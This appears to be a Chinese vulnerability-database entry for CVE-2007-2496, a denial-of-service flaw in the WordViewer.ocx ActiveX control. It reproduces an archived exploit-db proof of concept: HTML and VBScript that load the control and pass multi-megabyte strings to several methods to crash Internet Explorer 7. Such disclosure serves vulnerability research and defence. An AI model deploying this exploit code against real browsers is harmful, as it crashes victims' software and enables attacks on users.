Office OCX WordViewer.OCX Word Viewer ActiveX 拒绝服务攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112847 漏洞类型 Unknown
发布时间 2007-05-03 更新时间 2009-06-24
CVE编号 CVE-2007-2496 CNNVD-ID CNNVD-200705-091
漏洞平台 Windows CVSS评分 7.8
|漏洞来源
https://www.exploit-db.com/exploits/3836
https://www.securityfocus.com/bid/23784
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200705-091
|漏洞详情
WordViewer.ocx中的WordOCXActiveX控件允许远程攻击者借助一个长的(1)DoOleCommand,(2)FTPDownloadFile,(3)FTPUploadFile,(4)HttpUploadFile,(5)GotoPage,(6)Save,(7)SaveWebFile,(8)HttpDownloadFile,(9)Open,(10)OpenWebFile,(11)SaveAs或(12)ShowWordStandardDialog特征值,引起拒绝服务攻击(InternetExplorer7崩溃)。
|漏洞EXP
<span style="font: 14pt Courier New;"><p align="center"><b>2007/05/03</b></p></span>
<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">-----------------------------------------------------------------------------
 <b>WordViewer.ocx v. 3.2.0.5 multiple methods Denial of Service</b>
 url: http://www.officeocx.com/
 price: from €63.95 (update to last version) to €1,585.95 (Royalty)

 author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org

 Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
 all software that use this ocx are vulnerable to these exploits.
 Theese methods are vulnerable too:
 
 <b>DoOleCommand</b>
 <b>FTPDownloadFile</b>
 <b>FTPUploadFile</b>
 <b>HttpUploadFile</b>
 <b>GotoPage</b>
 <b>Save</b>
 <b>SaveWebFile</b>
-----------------------------------------------------------------------------

<object classid='clsid:97AF4A45-49BE-4485-9F55-91AB40F22BF2' id='WordOCX' width="405" height="50"></object>

<select style="width: 404px" name="Pucca">
  <option value = "HttpDownloadFile">HttpDownloadFile</option>
  <option value = "Open">Open</option>
  <option value = "OpenWebFile">OpenWebFile</option>
  <option value = "SaveAs">SaveAs</option>
  <option value = "ShowWordStandardDialog">ShowWordStandardDialog</option>
  <option value = "Quoting">Quoting...</option>
</select>

<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">

<script language='vbscript'>
 Sub tryMe
  on error resume next
   Dim MyMsg
   if Pucca.value = "HttpDownloadFile" then
     argCount = 2
     arg1=String(2097512,"A")
     arg2="defaultV"
     WordOCX.HttpDownloadFile arg1, arg2
   elseif Pucca.value = "SaveAs" then
     argCount = 2
     arg1=String(2097512,"A")
     arg2=1
     WordOCX.SaveAs arg1, arg2
   elseif Pucca.value = "Open" then
     argCount = 1
     arg1=String(2097512, "A")
     WordOCX.Open arg1
   elseif Pucca.value = "ShowWordStandardDialog" then
     argCount = 1
     arg1=32767
     WordOCX.ShowWordStandardDialog arg1
   elseif Pucca.value = "OpenWebFile" then
     argCount = 1
     arg1=String(2097512, "A")
     WordOCX.OpenWebFile arg1
   else
     MyMsg= MsgBox ("God is dead," & vbCrLf & _
     "Marx is dead," & vbCrLf &_
     "Freud is dead..." & vbCrLf & _
     "And I'm not feeling too well, myself", 64, "2007/05/03 - WordViewer v. 3.2")
   end if
 End Sub
</script>
</span></span>
</code></pre>

# milw0rm.com [2007-05-03]
|受影响的产品
Office OCX Word Viewer 3.2.0.5 Office OCX Word Viewer 3.2
|参考资料

来源:OSVDB
名称:34334
链接:http://osvdb.org/34334
来源:MISC
链接:http://moaxb.blogspot.com/2007/05/moaxb-03-wordviewerocx-32-multiple_03.html
来源:XF
名称:word-viewer-ocx-bo(34027)
链接:http://xforce.iss.net/xforce/xfdb/34027
来源:BID
名称:23784
链接:http://www.securityfocus.com/bid/23784
来源:VUPEN
名称:ADV-2007-1634
链接:http://www.frsirt.com/english/advisories/2007/1634
来源:SECUNIA
名称:25100
链接:http://secunia.com/advisories/25100